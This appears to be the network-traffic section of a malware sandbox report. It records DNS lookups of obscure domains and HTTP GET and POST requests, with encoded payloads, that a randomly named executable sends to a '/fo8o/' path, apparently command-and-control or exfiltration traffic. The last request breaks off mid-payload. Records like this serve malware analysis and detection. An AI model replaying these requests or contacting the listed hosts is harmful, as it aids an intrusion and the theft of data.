                                                                                    Jan 7, 2025 15:34:47.136085987 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.140929937 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.750137091 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.750152111 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.750211000 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:48.633546114 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.652251959 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.658830881 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:49.658900976 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.661007881 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.667711973 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:49.667727947 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:50.270564079 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:50.270586967 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:50.270750046 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:51.164940119 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.184087038 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.189049006 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.192166090 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.196084023 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.200944901 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.925978899 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.926086903 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.926156044 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.932109118 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.936927080 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.011219978 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:58.016058922 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.016129971 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:58.018270969 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:58.023060083 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.703078032 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.703640938 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.703747988 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:59.524180889 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.544357061 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.549232006 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:00.549413919 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.552124977 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.556952000 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:01.233527899 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:01.233555079 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:01.233611107 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:02.055592060 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.076128006 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.080935955 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.081022978 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.084131002 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.088979959 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.089047909 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.743637085 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.744030952 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.744096994 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:04.588135958 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.605647087 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.610452890 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:05.610524893 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.612638950 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.617387056 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:06.335695028 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:06.335757971 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:06.336025953 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:06.338598013 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:06.343327999 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:27.687038898 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:27.691837072 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:27.691895008 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:27.693969965 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:27.698746920 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:28.277826071 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:28.278160095 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:28.278314114 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:29.198306084 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.215039015 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.219846010 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.219921112 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.222574949 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.227452993 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.787947893 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.789027929 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.789138079 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:31.727489948 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.746134996 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.751326084 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:32.751509905 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.753498077 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.758493900 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:32.758507967 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:33.330490112 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:33.330504894 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:33.330557108 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:34.260225058 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.278011084 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.282903910 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.282979012 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.285566092 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.290359020 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872658014 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872692108 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872705936 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872834921 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.875871897 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.880661964 CET8050000217.196.55.202192.168.2.5
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 7, 2025 15:32:22.955933094 CET5743353192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:32:23.361741066 CET53574331.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:32:39.355140924 CET6063353192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:32:39.363625050 CET53606331.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:32:47.418051958 CET5521253192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:32:47.777664900 CET53552121.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:33:01.261496067 CET5153253192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:33:01.273639917 CET53515321.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:33:09.339912891 CET4969053192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:33:09.438405037 CET53496901.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:22.794219017 CET5661953192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:22.807137966 CET53566191.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:36.216028929 CET6173553192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:36.246231079 CET53617351.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:44.311588049 CET5894153192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:44.581171036 CET53589411.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:57.936517000 CET6295753192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:58.008301020 CET53629571.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:11.355808973 CET5542953192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:11.366904974 CET53554291.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:19.437757015 CET5978053192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:19.580524921 CET53597801.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:27.638637066 CET5456953192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:27.683727026 CET53545691.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:40.887833118 CET5704353192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:40.897267103 CET53570431.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:48.950599909 CET5785053192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:48.959638119 CET53578501.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:57.043489933 CET6120853192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:57.054841995 CET53612081.1.1.1192.168.2.5
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 7, 2025 15:32:22.955933094 CET | 192.168.2.5 | 1.1.1.1 | 0xf46d | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:32:39.355140924 CET | 192.168.2.5 | 1.1.1.1 | 0xa518 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:32:47.418051958 CET | 192.168.2.5 | 1.1.1.1 | 0xa04 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:33:01.261496067 CET | 192.168.2.5 | 1.1.1.1 | 0xeae2 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:33:09.339912891 CET | 192.168.2.5 | 1.1.1.1 | 0x2059 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:34:22.794219017 CET | 192.168.2.5 | 1.1.1.1 | 0x1a64 | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:34:36.216028929 CET | 192.168.2.5 | 1.1.1.1 | 0x7c4e | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:34:44.311588049 CET | 192.168.2.5 | 1.1.1.1 | 0x654 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:34:57.936517000 CET | 192.168.2.5 | 1.1.1.1 | 0x6b99 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:35:11.355808973 CET | 192.168.2.5 | 1.1.1.1 | 0xacf6 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:35:19.437757015 CET | 192.168.2.5 | 1.1.1.1 | 0x461e | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:35:27.638637066 CET | 192.168.2.5 | 1.1.1.1 | 0xf65a | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:35:40.887833118 CET | 192.168.2.5 | 1.1.1.1 | 0x14dd | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:35:48.950599909 CET | 192.168.2.5 | 1.1.1.1 | 0x6bb3 | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false |
| Jan 7, 2025 15:35:57.043489933 CET | 192.168.2.5 | 1.1.1.1 | 0xe2ac | Standard query (0) | www.shenzhoucui.com | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 15:32:23.361741066 CET | 1.1.1.1 | 192.168.2.5 | 0xf46d | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:32:39.363625050 CET | 1.1.1.1 | 192.168.2.5 | 0xa518 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:32:47.777664900 CET | 1.1.1.1 | 192.168.2.5 | 0xa04 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:33:01.273639917 CET | 1.1.1.1 | 192.168.2.5 | 0xeae2 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:33:09.438405037 CET | 1.1.1.1 | 192.168.2.5 | 0x2059 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 15:33:09.438405037 CET | 1.1.1.1 | 192.168.2.5 | 0x2059 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 15:33:09.438405037 CET | 1.1.1.1 | 192.168.2.5 | 0x2059 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:34:22.807137966 CET | 1.1.1.1 | 192.168.2.5 | 0x1a64 | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:34:36.246231079 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4e | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:34:44.581171036 CET | 1.1.1.1 | 192.168.2.5 | 0x654 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:34:58.008301020 CET | 1.1.1.1 | 192.168.2.5 | 0x6b99 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 15:34:58.008301020 CET | 1.1.1.1 | 192.168.2.5 | 0x6b99 | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:35:11.366904974 CET | 1.1.1.1 | 192.168.2.5 | 0xacf6 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:35:19.580524921 CET | 1.1.1.1 | 192.168.2.5 | 0x461e | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:35:27.683727026 CET | 1.1.1.1 | 192.168.2.5 | 0xf65a | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 15:35:27.683727026 CET | 1.1.1.1 | 192.168.2.5 | 0xf65a | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:35:40.897267103 CET | 1.1.1.1 | 192.168.2.5 | 0x14dd | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:35:48.959638119 CET | 1.1.1.1 | 192.168.2.5 | 0x6bb3 | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:35:57.054841995 CET | 1.1.1.1 | 192.168.2.5 | 0xe2ac | Name error (3) | www.shenzhoucui.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                    • www.3xfootball.com
                                                                                    • www.goldenjade-travel.com
                                                                                    • www.magmadokum.com
                                                                                    • www.rssnewscast.com
                                                                                    • www.techchains.info
                                                                                    • www.elettrosistemista.zip
                                                                                    • www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49736 | 154.215.72.110 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 15:32:23.375811100 CET | 519 | OUT | GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.3xfootball.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 7, 2025 15:32:24.303663015 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Tue, 07 Jan 2025 14:32:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 548
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49888 | 116.50.37.244 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 15:32:47.787595987 CET | 801 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                    Data Ascii: FPJps=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Jan 7, 2025 15:32:48.676845074 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:48 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49898 | 116.50.37.244 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 15:32:50.314866066 CET | 821 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34
